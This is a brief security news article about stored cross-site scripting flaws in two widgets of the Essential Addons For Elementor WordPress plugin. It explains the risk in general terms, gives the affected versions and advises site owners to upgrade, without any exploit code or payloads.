WordPress website owners need to be careful. They are strongly warned of a critical security flaw that has been found in the Essential Addons For Elementor plugin. More than 2 million websites have been so far affected globally. Security researchers reveal they have identified Stored Cross-Site Scripting (XSS) vulnerabilities within two widgets of the plugin and these pose a significant risk to website visitors.
It is learned that the vulnerability lies within the Countdown Widget and Woo Product Carousel Widget. Both are integral parts of the Essential Addons For Elementor plugin. The flaws basically allow attackers to upload malicious scripts on the websites and this potentially compromises visitor browsers. The attackers can even steal sensitive information such as session cookies. They ultimately get control over the website.
XSS vulnerabilities stem from inadequate sanitization and output escaping processes. These safeguard the websites from malicious inputs and hence the unwanted data does not reach the browsers. In the latest finding, failure has been seen in proper filtering.
The vulnerability requires attackers to be authenticated. This means that they need to obtain website credentials first. The attackers can exploit this flaw.
The threat is alarming and immediate action need to be taken. The vulnerability has been classified as a medium-level threat with score of 6.4 out of 10 on the severity scale. Users with Essential Addons For Elementor versions 5.9.11 or lower are strongly advised to upgrade to the latest version to overcome the risk and safeguard their websites.
It is strongly suggested not to leave the website vulnerable to exploitation. Website owners should take proactive steps to ensure security.